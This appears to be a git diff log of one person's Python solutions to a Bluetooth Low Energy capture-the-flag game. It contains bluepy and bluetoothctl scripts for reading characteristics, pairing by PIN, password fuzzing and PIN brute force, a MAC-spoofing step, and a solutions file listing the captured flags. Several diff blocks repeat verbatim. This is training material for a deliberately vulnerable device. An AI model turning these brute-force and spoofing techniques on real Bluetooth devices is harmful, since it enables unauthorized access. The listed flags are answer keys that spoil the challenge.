-p = btle.Peripheral(deviceMAC)
-svc=p.getServiceByUUID(0x00FF)
-print ("Attached to peripheral")
-
-print("Loading level 04")
-hex1 = binascii.unhexlify(str('%0*x' % (4,2)))
-p.writeCharacteristic(0x30, hex1, withResponse=False)
-
-password = "AABBCCDDEEFF"
-
-sys.stdout.write("\rTrying: %s " % password.rstrip())
-response = p.writeCharacteristic(0x2C, password.rstrip(), withResponse=True)
-while True:
- if p.waitForNotifications(1.0):
- # handleNotification() was called
- continue
- print "Waiting..."
-
- #hex1 = p.readCharacteristic(0x2C)
- #hex2 = binascii.b2a_hex(hex1)
- #hexlif2 = str(binascii.unhexlify(hex2))
-
-class MyDelegate(btle.DefaultDelegate):
- def __init__(self, params):
- btle.DefaultDelegate.__init__(self)
- # ... initialise here
-
- def handleNotification(self, cHandle, data):
- # ... perhaps check cHandle
- # ... process 'data'
- print("Data: "+data)
-
-p.disconnect()
\ No newline at end of file
diff --git a/lvl_01.py b/lvl_01.py
index f4046b7..ea6752f 100755
--- a/lvl_01.py
+++ b/lvl_01.py
@@ -5,7 +5,7 @@
import bluepy.btle as btle
'''
-42 0x2A READ goodbye 👋
+42 0x2A READ goodbye
fc3fd58dcdad9ab23fac
'''
@@ -26,4 +26,4 @@
hexlif2 = str(binascii.unhexlify(hex2))
print("Flag: %s" % hexlif2)
-p.disconnect()
\ No newline at end of file
+p.disconnect()
diff --git a/lvl_02.py b/lvl_02.py
index b6665d8..58d3e7a 100755
--- a/lvl_02.py
+++ b/lvl_02.py
@@ -38,4 +38,4 @@
print "Flag: %s" % hexlif2
break;
-p.disconnect()
\ No newline at end of file
+p.disconnect()
diff --git a/lvl_03.py b/lvl_03.py
index 8303d8c..1ae79f8 100755
--- a/lvl_03.py
+++ b/lvl_03.py
@@ -22,9 +22,10 @@
def pair_with_pin(start_time, pin, time_limit=60): # int(time.time()), pin - \d{4}, time_limit - approximate pairing window time in seconds, it might take up to 2x (nested timeout conditions)
"exectutes pairing with entered PIN on bluetooth adapter side"
try:
-
+
newpid = os.fork()
if newpid == 0:
+ time.sleep(5)
'''
Start bluepy stuff
'''
@@ -34,7 +35,7 @@
deviceMAC = open('ctf_mac.txt').read()
p = btle.Peripheral(deviceMAC)
svc=p.getServiceByUUID("0000180d-0000-1000-8000-00805f9b34fb")
- print ("Attached to peripheral")
+ print ("Attached to peripheral (pid 0)")
hex1 = p.readCharacteristic(0x2C)
hex2 = binascii.b2a_hex(hex1)
hexlif2 = str(binascii.unhexlify(hex2))
@@ -42,12 +43,14 @@
p.disconnect()
exit()
else:
+
'''
- Start actual pair stuff
+ Start actual pair stuff
'''
subprocess.call(['hciconfig','hci0','sspmode', '0'])
# bluetoothctl
+ print("Pairing")
child = pexpect.spawn('bluetoothctl')
child.logfile = open("/tmp/mylog", "w")
child.expect("#")
@@ -63,6 +66,8 @@
child.expect("discoverable on succeeded")
child.sendline('default-agent')
child.sendline('remove 3c:71:bf:f1:ef:c6')
+ child.sendline('scan on')
+ child.expect("Device 3C:71:BF:F1:EF:C6 FLAG_3")
child.sendline('pair 3c:71:bf:f1:ef:c6')
child.expect('Request passkey', timeout = time_limit ) # timeout <= PAIRING_TIME_LIMIT to keep some kind of logic
@@ -74,6 +79,7 @@
child.sendline(trust_mac) # optionally add device to trusted
child.expect('trust succeeded', timeout = 10)
pairing_status = True
+ child.sendline('remove 3c:71:bf:f1:ef:c6')
else: # i == 1
print('wrong PIN, retrying if time will allow')
except pexpect.EOF:
@@ -107,4 +113,4 @@
status = pair_with_pin(int(time.time()), str(BT_PIN), PAIRING_TIME_LIMIT)
if status == True:
- print('Pairing successful')
\ No newline at end of file
+ print('Pairing successful')
diff --git a/lvl_04.py b/lvl_04.py
index 21ede3e..91a4029 100755
--- a/lvl_04.py
+++ b/lvl_04.py
@@ -93,7 +93,7 @@
#sys.stdout.write(" Response: " + hexstr) # for debugging
if(password.strip("0") != hexstr):
- print(" Flag: %s" % notificationData.rstrip())
+ print("\nFlag: %s" % notificationData.rstrip())
exit()
else:
gotResponse = True
@@ -101,4 +101,4 @@
print "Waiting..."
finally:
- p.disconnect()
\ No newline at end of file
+ p.disconnect()
diff --git a/lvl_07.py b/lvl_07.py
index 8b6ae2e..6e56906 100755
--- a/lvl_07.py
+++ b/lvl_07.py
@@ -46,6 +46,8 @@
child.expect("discoverable on succeeded")
child.sendline('default-agent')
child.sendline('remove 3c:71:bf:f1:ef:c6')
+ child.sendline('scan on')
+ child.expect("Device 3C:71:BF:F1:EF:C6 FLAG_3")
child.sendline('pair 3c:71:bf:f1:ef:c6')
i = child.expect('Paired: yes', timeout = time_limit)
@@ -73,7 +75,7 @@
print ("[bp] Attached to peripheral")
print("[++] Loading level 07")
-hex1 = binascii.unhexlify(str('%0*x' % (4,3)))
+hex1 = binascii.unhexlify(str('%0*x' % (4,7)))
p.writeCharacteristic(0x30, hex1, withResponse=False)
p.disconnect()
@@ -96,4 +98,4 @@
hexlif2 = str(binascii.unhexlify(hex2))
print("[==] Flag: "+hexlif2)
p.disconnect()
-exit()
\ No newline at end of file
+exit()
diff --git a/lvl_08_incomplete.py b/lvl_08_incomplete.py
new file mode 100644
index 0000000..35a05d5
--- /dev/null
+++ b/lvl_08_incomplete.py
@@ -0,0 +1,10 @@
+#! /usr/bin/python
+import binascii
+import struct
+import sys, os, time
+import bluepy.btle as btle
+
+'''
+42 0x2A READ Brute force my pin. Start from 0000. Try using bluetoothctl & expect
+
+'''
diff --git a/lvl_09_incomplete.py b/lvl_09_incomplete.py
new file mode 100644
index 0000000..8f3a108
--- /dev/null
+++ b/lvl_09_incomplete.py
@@ -0,0 +1,10 @@
+#! /usr/bin/python
+import binascii
+import struct
+import sys, os, time
+import bluepy.btle as btle
+
+'''
+42 0x2A READ Im advertising the flag
+
+'''
diff --git a/README.md b/README.md
index c6f5c90..8eee691 100644
--- a/README.md
+++ b/README.md
@@ -1,4 +1,10 @@
BLE_CTF_V2
===============
-BLE CTF v2
\ No newline at end of file
+BLE CTF v2 (Infinity)
+
+https://github.com/hackgnar/ble_ctf_infinity
+
+Thanks @hackgnar for this fun CTF
+
+I decided I wanted to try to complete this using python, this repo contains my solutions.
diff --git a/level_04.py b/level_04.py
deleted file mode 100644
index 252cefb..0000000
--- a/level_04.py
+++ /dev/null
@@ -1,46 +0,0 @@
-#! /usr/bin/python
-import binascii
-import struct
-import sys, os, time
-import bluepy.btle as btle
-
-'''
-42 0x2A READ Handle 0x002C takes value AABBCCDDEEFF. Fuzz a varient of this to find the flag!
-44 0x2C NOTIFY WRITE
-46 0x2E READ WRITE write here to goto to scoreboard
-'''
-
-deviceMAC = open('ctf_mac.txt').read()
-p = btle.Peripheral(deviceMAC)
-svc=p.getServiceByUUID(0x00FF)
-print ("Attached to peripheral")
-
-print("Loading level 04")
-hex1 = binascii.unhexlify(str('%0*x' % (4,2)))
-p.writeCharacteristic(0x30, hex1, withResponse=False)
-
-password = "AABBCCDDEEFF"
-
-sys.stdout.write("\rTrying: %s " % password.rstrip())
-response = p.writeCharacteristic(0x2C, password.rstrip(), withResponse=True)
-while True:
- if p.waitForNotifications(1.0):
- # handleNotification() was called
- continue
- print "Waiting..."
-
- #hex1 = p.readCharacteristic(0x2C)
- #hex2 = binascii.b2a_hex(hex1)
- #hexlif2 = str(binascii.unhexlify(hex2))
-
-class MyDelegate(btle.DefaultDelegate):
- def __init__(self, params):
- btle.DefaultDelegate.__init__(self)
- # ... initialise here
-
- def handleNotification(self, cHandle, data):
- # ... perhaps check cHandle
- # ... process 'data'
- print("Data: "+data)
-
-p.disconnect()
\ No newline at end of file
diff --git a/lvl_01.py b/lvl_01.py
index f4046b7..ea6752f 100755
--- a/lvl_01.py
+++ b/lvl_01.py
@@ -5,7 +5,7 @@
import bluepy.btle as btle
'''
-42 0x2A READ goodbye 👋
+42 0x2A READ goodbye
fc3fd58dcdad9ab23fac
'''
@@ -26,4 +26,4 @@
hexlif2 = str(binascii.unhexlify(hex2))
print("Flag: %s" % hexlif2)
-p.disconnect()
\ No newline at end of file
+p.disconnect()
diff --git a/lvl_02.py b/lvl_02.py
index b6665d8..58d3e7a 100755
--- a/lvl_02.py
+++ b/lvl_02.py
@@ -38,4 +38,4 @@
print "Flag: %s" % hexlif2
break;
-p.disconnect()
\ No newline at end of file
+p.disconnect()
diff --git a/lvl_03.py b/lvl_03.py
index 8303d8c..1ae79f8 100755
--- a/lvl_03.py
+++ b/lvl_03.py
@@ -22,9 +22,10 @@
def pair_with_pin(start_time, pin, time_limit=60): # int(time.time()), pin - \d{4}, time_limit - approximate pairing window time in seconds, it might take up to 2x (nested timeout conditions)
"exectutes pairing with entered PIN on bluetooth adapter side"
try:
-
+
newpid = os.fork()
if newpid == 0:
+ time.sleep(5)
'''
Start bluepy stuff
'''
@@ -34,7 +35,7 @@
deviceMAC = open('ctf_mac.txt').read()
p = btle.Peripheral(deviceMAC)
svc=p.getServiceByUUID("0000180d-0000-1000-8000-00805f9b34fb")
- print ("Attached to peripheral")
+ print ("Attached to peripheral (pid 0)")
hex1 = p.readCharacteristic(0x2C)
hex2 = binascii.b2a_hex(hex1)
hexlif2 = str(binascii.unhexlify(hex2))
@@ -42,12 +43,14 @@
p.disconnect()
exit()
else:
+
'''
- Start actual pair stuff
+ Start actual pair stuff
'''
subprocess.call(['hciconfig','hci0','sspmode', '0'])
# bluetoothctl
+ print("Pairing")
child = pexpect.spawn('bluetoothctl')
child.logfile = open("/tmp/mylog", "w")
child.expect("#")
@@ -63,6 +66,8 @@
child.expect("discoverable on succeeded")
child.sendline('default-agent')
child.sendline('remove 3c:71:bf:f1:ef:c6')
+ child.sendline('scan on')
+ child.expect("Device 3C:71:BF:F1:EF:C6 FLAG_3")
child.sendline('pair 3c:71:bf:f1:ef:c6')
child.expect('Request passkey', timeout = time_limit ) # timeout <= PAIRING_TIME_LIMIT to keep some kind of logic
@@ -74,6 +79,7 @@
child.sendline(trust_mac) # optionally add device to trusted
child.expect('trust succeeded', timeout = 10)
pairing_status = True
+ child.sendline('remove 3c:71:bf:f1:ef:c6')
else: # i == 1
print('wrong PIN, retrying if time will allow')
except pexpect.EOF:
@@ -107,4 +113,4 @@
status = pair_with_pin(int(time.time()), str(BT_PIN), PAIRING_TIME_LIMIT)
if status == True:
- print('Pairing successful')
\ No newline at end of file
+ print('Pairing successful')
diff --git a/lvl_04.py b/lvl_04.py
index 21ede3e..91a4029 100755
--- a/lvl_04.py
+++ b/lvl_04.py
@@ -93,7 +93,7 @@
#sys.stdout.write(" Response: " + hexstr) # for debugging
if(password.strip("0") != hexstr):
- print(" Flag: %s" % notificationData.rstrip())
+ print("\nFlag: %s" % notificationData.rstrip())
exit()
else:
gotResponse = True
@@ -101,4 +101,4 @@
print "Waiting..."
finally:
- p.disconnect()
\ No newline at end of file
+ p.disconnect()
diff --git a/lvl_07.py b/lvl_07.py
index 8b6ae2e..6e56906 100755
--- a/lvl_07.py
+++ b/lvl_07.py
@@ -46,6 +46,8 @@
child.expect("discoverable on succeeded")
child.sendline('default-agent')
child.sendline('remove 3c:71:bf:f1:ef:c6')
+ child.sendline('scan on')
+ child.expect("Device 3C:71:BF:F1:EF:C6 FLAG_3")
child.sendline('pair 3c:71:bf:f1:ef:c6')
i = child.expect('Paired: yes', timeout = time_limit)
@@ -73,7 +75,7 @@
print ("[bp] Attached to peripheral")
print("[++] Loading level 07")
-hex1 = binascii.unhexlify(str('%0*x' % (4,3)))
+hex1 = binascii.unhexlify(str('%0*x' % (4,7)))
p.writeCharacteristic(0x30, hex1, withResponse=False)
p.disconnect()
@@ -96,4 +98,4 @@
hexlif2 = str(binascii.unhexlify(hex2))
print("[==] Flag: "+hexlif2)
p.disconnect()
-exit()
\ No newline at end of file
+exit()
diff --git a/lvl_08_incomplete.py b/lvl_08_incomplete.py
new file mode 100644
index 0000000..35a05d5
--- /dev/null
+++ b/lvl_08_incomplete.py
@@ -0,0 +1,10 @@
+#! /usr/bin/python
+import binascii
+import struct
+import sys, os, time
+import bluepy.btle as btle
+
+'''
+42 0x2A READ Brute force my pin. Start from 0000. Try using bluetoothctl & expect
+
+'''
diff --git a/lvl_09_incomplete.py b/lvl_09_incomplete.py
new file mode 100644
index 0000000..8f3a108
--- /dev/null
+++ b/lvl_09_incomplete.py
@@ -0,0 +1,10 @@
+#! /usr/bin/python
+import binascii
+import struct
+import sys, os, time
+import bluepy.btle as btle
+
+'''
+42 0x2A READ Im advertising the flag
+
+'''
diff --git a/notes.txt b/notes.txt
index 71efc09..ed1bbbf 100644
--- a/notes.txt
+++ b/notes.txt
@@ -1,4 +1,11 @@
+Setup:
+ $> rfkill unblock all
+ $> btmgmt le on
+ $> systemctl start bluetooth
+ $> hciconfig hci0 up
+ $> hciconfig hci0 reset
+ $> hcitool lescan
Search for MAC addresses around:
hcitool lescan
enumerate the MAC
- bleah -b 11:22:33:44:55:66 -e
\ No newline at end of file
+ bleah -b 11:22:33:44:55:66 -e
diff --git a/README.md b/README.md
index c6f5c90..8eee691 100644
--- a/README.md
+++ b/README.md
@@ -1,4 +1,10 @@
BLE_CTF_V2
===============
-BLE CTF v2
\ No newline at end of file
+BLE CTF v2 (Infinity)
+
+https://github.com/hackgnar/ble_ctf_infinity
+
+Thanks @hackgnar for this fun CTF
+
+I decided I wanted to try to complete this using python, this repo contains my solutions.
diff --git a/level_04.py b/level_04.py
deleted file mode 100644
index 252cefb..0000000
--- a/level_04.py
+++ /dev/null
@@ -1,46 +0,0 @@
-#! /usr/bin/python
-import binascii
-import struct
-import sys, os, time
-import bluepy.btle as btle
-
-'''
-42 0x2A READ Handle 0x002C takes value AABBCCDDEEFF. Fuzz a varient of this to find the flag!
-44 0x2C NOTIFY WRITE
-46 0x2E READ WRITE write here to goto to scoreboard
-'''
-
-deviceMAC = open('ctf_mac.txt').read()
-p = btle.Peripheral(deviceMAC)
-svc=p.getServiceByUUID(0x00FF)
-print ("Attached to peripheral")
-
-print("Loading level 04")
-hex1 = binascii.unhexlify(str('%0*x' % (4,2)))
-p.writeCharacteristic(0x30, hex1, withResponse=False)
-
-password = "AABBCCDDEEFF"
-
-sys.stdout.write("\rTrying: %s " % password.rstrip())
-response = p.writeCharacteristic(0x2C, password.rstrip(), withResponse=True)
-while True:
- if p.waitForNotifications(1.0):
- # handleNotification() was called
- continue
- print "Waiting..."
-
- #hex1 = p.readCharacteristic(0x2C)
- #hex2 = binascii.b2a_hex(hex1)
- #hexlif2 = str(binascii.unhexlify(hex2))
-
-class MyDelegate(btle.DefaultDelegate):
- def __init__(self, params):
- btle.DefaultDelegate.__init__(self)
- # ... initialise here
-
- def handleNotification(self, cHandle, data):
- # ... perhaps check cHandle
- # ... process 'data'
- print("Data: "+data)
-
-p.disconnect()
\ No newline at end of file
diff --git a/lvl_01.py b/lvl_01.py
index f4046b7..ea6752f 100755
--- a/lvl_01.py
+++ b/lvl_01.py
@@ -5,7 +5,7 @@
import bluepy.btle as btle
'''
-42 0x2A READ goodbye 👋
+42 0x2A READ goodbye
fc3fd58dcdad9ab23fac
'''
@@ -26,4 +26,4 @@
hexlif2 = str(binascii.unhexlify(hex2))
print("Flag: %s" % hexlif2)
-p.disconnect()
\ No newline at end of file
+p.disconnect()
diff --git a/lvl_02.py b/lvl_02.py
index b6665d8..58d3e7a 100755
--- a/lvl_02.py
+++ b/lvl_02.py
@@ -38,4 +38,4 @@
print "Flag: %s" % hexlif2
break;
-p.disconnect()
\ No newline at end of file
+p.disconnect()
diff --git a/lvl_03.py b/lvl_03.py
index 8303d8c..1ae79f8 100755
--- a/lvl_03.py
+++ b/lvl_03.py
@@ -22,9 +22,10 @@
def pair_with_pin(start_time, pin, time_limit=60): # int(time.time()), pin - \d{4}, time_limit - approximate pairing window time in seconds, it might take up to 2x (nested timeout conditions)
"exectutes pairing with entered PIN on bluetooth adapter side"
try:
-
+
newpid = os.fork()
if newpid == 0:
+ time.sleep(5)
'''
Start bluepy stuff
'''
@@ -34,7 +35,7 @@
deviceMAC = open('ctf_mac.txt').read()
p = btle.Peripheral(deviceMAC)
svc=p.getServiceByUUID("0000180d-0000-1000-8000-00805f9b34fb")
- print ("Attached to peripheral")
+ print ("Attached to peripheral (pid 0)")
hex1 = p.readCharacteristic(0x2C)
hex2 = binascii.b2a_hex(hex1)
hexlif2 = str(binascii.unhexlify(hex2))
@@ -42,12 +43,14 @@
p.disconnect()
exit()
else:
+
'''
- Start actual pair stuff
+ Start actual pair stuff
'''
subprocess.call(['hciconfig','hci0','sspmode', '0'])
# bluetoothctl
+ print("Pairing")
child = pexpect.spawn('bluetoothctl')
child.logfile = open("/tmp/mylog", "w")
child.expect("#")
@@ -63,6 +66,8 @@
child.expect("discoverable on succeeded")
child.sendline('default-agent')
child.sendline('remove 3c:71:bf:f1:ef:c6')
+ child.sendline('scan on')
+ child.expect("Device 3C:71:BF:F1:EF:C6 FLAG_3")
child.sendline('pair 3c:71:bf:f1:ef:c6')
child.expect('Request passkey', timeout = time_limit ) # timeout <= PAIRING_TIME_LIMIT to keep some kind of logic
@@ -74,6 +79,7 @@
child.sendline(trust_mac) # optionally add device to trusted
child.expect('trust succeeded', timeout = 10)
pairing_status = True
+ child.sendline('remove 3c:71:bf:f1:ef:c6')
else: # i == 1
print('wrong PIN, retrying if time will allow')
except pexpect.EOF:
@@ -107,4 +113,4 @@
status = pair_with_pin(int(time.time()), str(BT_PIN), PAIRING_TIME_LIMIT)
if status == True:
- print('Pairing successful')
\ No newline at end of file
+ print('Pairing successful')
diff --git a/lvl_04.py b/lvl_04.py
index 21ede3e..91a4029 100755
--- a/lvl_04.py
+++ b/lvl_04.py
@@ -93,7 +93,7 @@
#sys.stdout.write(" Response: " + hexstr) # for debugging
if(password.strip("0") != hexstr):
- print(" Flag: %s" % notificationData.rstrip())
+ print("\nFlag: %s" % notificationData.rstrip())
exit()
else:
gotResponse = True
@@ -101,4 +101,4 @@
print "Waiting..."
finally:
- p.disconnect()
\ No newline at end of file
+ p.disconnect()
diff --git a/lvl_07.py b/lvl_07.py
index 8b6ae2e..6e56906 100755
--- a/lvl_07.py
+++ b/lvl_07.py
@@ -46,6 +46,8 @@
child.expect("discoverable on succeeded")
child.sendline('default-agent')
child.sendline('remove 3c:71:bf:f1:ef:c6')
+ child.sendline('scan on')
+ child.expect("Device 3C:71:BF:F1:EF:C6 FLAG_3")
child.sendline('pair 3c:71:bf:f1:ef:c6')
i = child.expect('Paired: yes', timeout = time_limit)
@@ -73,7 +75,7 @@
print ("[bp] Attached to peripheral")
print("[++] Loading level 07")
-hex1 = binascii.unhexlify(str('%0*x' % (4,3)))
+hex1 = binascii.unhexlify(str('%0*x' % (4,7)))
p.writeCharacteristic(0x30, hex1, withResponse=False)
p.disconnect()
@@ -96,4 +98,4 @@
hexlif2 = str(binascii.unhexlify(hex2))
print("[==] Flag: "+hexlif2)
p.disconnect()
-exit()
\ No newline at end of file
+exit()
diff --git a/lvl_08_incomplete.py b/lvl_08_incomplete.py
new file mode 100644
index 0000000..35a05d5
--- /dev/null
+++ b/lvl_08_incomplete.py
@@ -0,0 +1,10 @@
+#! /usr/bin/python
+import binascii
+import struct
+import sys, os, time
+import bluepy.btle as btle
+
+'''
+42 0x2A READ Brute force my pin. Start from 0000. Try using bluetoothctl & expect
+
+'''
diff --git a/lvl_09_incomplete.py b/lvl_09_incomplete.py
new file mode 100644
index 0000000..8f3a108
--- /dev/null
+++ b/lvl_09_incomplete.py
@@ -0,0 +1,10 @@
+#! /usr/bin/python
+import binascii
+import struct
+import sys, os, time
+import bluepy.btle as btle
+
+'''
+42 0x2A READ Im advertising the flag
+
+'''
diff --git a/notes.txt b/notes.txt
index 71efc09..ed1bbbf 100644
--- a/notes.txt
+++ b/notes.txt
@@ -1,4 +1,11 @@
+Setup:
+ $> rfkill unblock all
+ $> btmgmt le on
+ $> systemctl start bluetooth
+ $> hciconfig hci0 up
+ $> hciconfig hci0 reset
+ $> hcitool lescan
Search for MAC addresses around:
hcitool lescan
enumerate the MAC
- bleah -b 11:22:33:44:55:66 -e
\ No newline at end of file
+ bleah -b 11:22:33:44:55:66 -e
diff --git a/solutions.txt b/solutions.txt
new file mode 100644
index 0000000..e407ed4
--- /dev/null
+++ b/solutions.txt
@@ -0,0 +1,64 @@
+root@NanoyPiBenchDash:/opt/BLE_CTF_V2# ./lvl_00.py
+Attached to peripheral
+Sending "12345678901234567890" to 0x2e
+Done
+
+root@NanoyPiBenchDash:/opt/BLE_CTF_V2# ./lvl_01.py
+Attached to peripheral
+Loading level 1
+Reading value
+Flag: eca7d1f3cf60a8b5344a
+
+root@NanoyPiBenchDash:/opt/BLE_CTF_V2# ./lvl_02.py
+Attached to peripheral
+Loading level 02
+Password Found: password1234
+Flag: eca7d1f3cf60a8b5344a
+
+/***
+ * nano /etc/systemd/system/dbus-org.bluez.service
+ * set: ExecStart=/usr/lib/bluetooth/bluetoothd --compat
+ */
+root@NanoyPiBenchDash:/opt/BLE_CTF_V2# systemctl daemon-reload
+root@NanoyPiBenchDash:/opt/BLE_CTF_V2# service bluetooth restart
+root@NanoyPiBenchDash:/opt/BLE_CTF_V2# ./lvl_03.py
+Attached to peripheral
+Loading level 03
+Pairing
+Attached to peripheral (pid 0)
+Sending PIN: 0000
+Flag: b46fa238cf820d0f60c1
+Pairing successful
+
+root@NanoyPiBenchDash:/opt/BLE_CTF_V2# ./lvl_04.py
+Attached to peripheral
+Loading level 04
+Generating wordlist
+Trying: AABBC8DDEEFF
+Flag: f401f21d02fdd0a4fc00
+
+root@NanoyPiBenchDash:/opt/BLE_CTF_V2# ./lvl_05.py
+Attached to peripheral
+Loading level 05
+Sending "121212121222" to 0x2c
+Reading value
+Flag: 84cf61c35b2d9c92217d
+
+root@NanoyPiBenchDash:/opt/BLE_CTF_V2# ./lvl_06.py
+Attached to peripheral
+Loading level 06
+Manufacturer: Cypress Semiconductor Corporation (305)
+Device address: B8:27:EB:81:86:56 (Raspberry Pi Foundation)
+New BD address: 11:22:33:44:55:66
+Address changed - Reset device now
+Reading value
+Flag: 1dec0e624f2ecf1513dc
+
+root@NanoyPiBenchDash:/opt/BLE_CTF_V2# ./lvl_07.py
+[bp] Attached to peripheral
+[++] Loading level 07
+[sp] starting bluetoothctl
+[sp] Timeout
+[sp] Pairing successful
+[bp] Attached to peripheral
+[==] Flag: a16ee1a4001c66c3a670